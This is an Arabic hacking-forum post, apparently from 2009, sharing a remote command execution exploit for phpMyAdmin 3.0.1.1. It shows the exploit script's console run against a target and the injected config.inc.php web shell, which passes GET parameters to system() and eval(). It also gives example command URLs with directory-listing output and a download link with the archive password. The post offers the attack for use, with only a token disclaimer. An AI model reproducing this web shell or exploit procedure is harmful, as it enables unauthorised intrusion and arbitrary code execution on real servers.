الســـــلام عليكم شباب ...
ظهرت ثغره قوية البارحة للPhpMyAdmin بلميل وورم مع انه صعب وجود اي ثغره فعاله كPoC/exploit لبرنامج مفتوح المصدر وشهير جدا ك PhpMyAdmin .
والجميل بلثغره انه مازالت امكانية وجود ثغرات ريموت كومند ( remote command execution ) او هيب اوفر فلو ( heap overflow ) او حتى سيكيول انجكشن ك ( xp_cmdshell - cmd - etc ) .
وطبعا حصريا لشباب منتدى سيكيورتي رولز وصلني البارحة من صديق عزيز ريموت كومند للثغره بحيث نقدر من خلال الشل كود هذا نقوم بإختراق السيرفر ( نبرء ذمتي وذمة الشباب من اي عملية اختراق عربية )
كود PHP:
./SEC-R1Z_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\_ _ _ _/ /_ _ / / __ | () / | | / /
\_ _ _ _/ /_ _ / / |__|| / | | / /
_ _ _ _\ \_ _ \ \2_0_0_9 | \ | | / /_ _
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ ./J0_ _\_
[b0x@r1z ~]./phpMyAdmin-sec-r1z.sh
usage: ./phpMyAdmin-sec-r1z.sh
i.e.: ./phpMyAdmin-sec-r1z.sh http://target.tld/phpMyAdmin/
[b0x@r1z ~]./phpMyAdmin-sec-r1z.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin ****** and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdmin-sec-r1z.sh.9217.phpinfo.r1z.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentestergmail.com
[b0x@r1z ~]curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 r1z
طبعا السكربت مو برمجتي وماله علاقه بمنتدانا ! فقط للتنويه
اللحين بعد تشغيل السكربت لل
كود PHP:
/config/config.inc.php
تم حقن الايفل كود حقنا ( السورس كود )
كود PHP:
<?php
/*
* Generated configuration file
* Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
* Date: Tue, 09 Jun 2009 14:13:34 GMT
*/
/* Servers configuration */
$i = 0;
/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
?>
باسوورد الباش سكربت
www.sec-r1z.com
رابط الفيديو مضغوط اول شي rar ومن ثم zip لاجل حجمه بلتحميل ...
كود PHP:
http://rapidshare.com/files/243217562/_sec-r1z.com.zip
تحياتي .
يرجى ذكر المصدر عند النقل
SecurityRules
www.sec-r1z.com
منقووول
phpMyAdmin vdl,j ;,lk] !! PoC